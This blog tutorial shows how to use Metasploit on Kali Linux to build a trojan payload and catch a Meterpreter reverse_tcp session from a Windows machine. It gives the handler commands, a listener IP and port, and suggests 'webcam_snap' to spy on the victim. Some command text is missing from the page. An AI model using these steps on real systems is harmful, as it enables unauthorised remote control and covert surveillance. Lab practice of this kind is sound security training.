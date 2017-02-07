UX Techno

Platform for learning UNIX & LINUX technologies

You are here: Home / Kali Linux / Quick Guide: How To hack windows with Kali Linux

Quick Guide: How To hack windows with Kali Linux

By Leave a Comment

Kali Linux is derived from Debian Linux flavor and its mainly used for penetration tasting. It has more than 300 pre-installed  penetration-testing programs. It is a supported platform of the Metasploit Project’s Metasploit Framework, a tool for developing and executing security exploits. Let begin with hack windows with Kali Linux.Kindly note that , I am writing this post for education purpose only.

Source machine details:

Kali Linux

Target machine used for hacking:

Step 1. Create Payload

Payload is a program which is similar as a virus or trojan which get executed on the remote machine for hacking purpose. To create payload program use below command which will hack windows with Kali Linux.

With ls command we have confirmed that our Payload program is successfully created at the given location.

Step 2: Run mfsconsole command which will start msf prompt.

Step 3:  For exploiting I have used following details:

  • Port 4444: you can use as per your choice
  • LHOST IP: which is nothing but the Kali Linux machines IP 192.168.189.128. to Know ip of your kali machine use below command.

Now give following command at msf prompt “use exploit/multi/handler”

Then give command “set payload windows/meterpreter/reverse_tcp” at the next prompt:

Now set local IP and port using LHOST and LPORT command as below:

and finally give exploit command.

Now you need to execute the “program.exe” on the windows machine once its executed on target machine , you can able to establish a meterpreter session. Just type sysinfo to get the details hacked windows machine.

Once you successfully get this details you can do more exploit or get more information using “help” command which will show all the options by which you can hack the system e.g. to get the webcam snap use command “webcam_snap” same way you can use many available option available. Happy hacking!!!!

 

 

Leave a Reply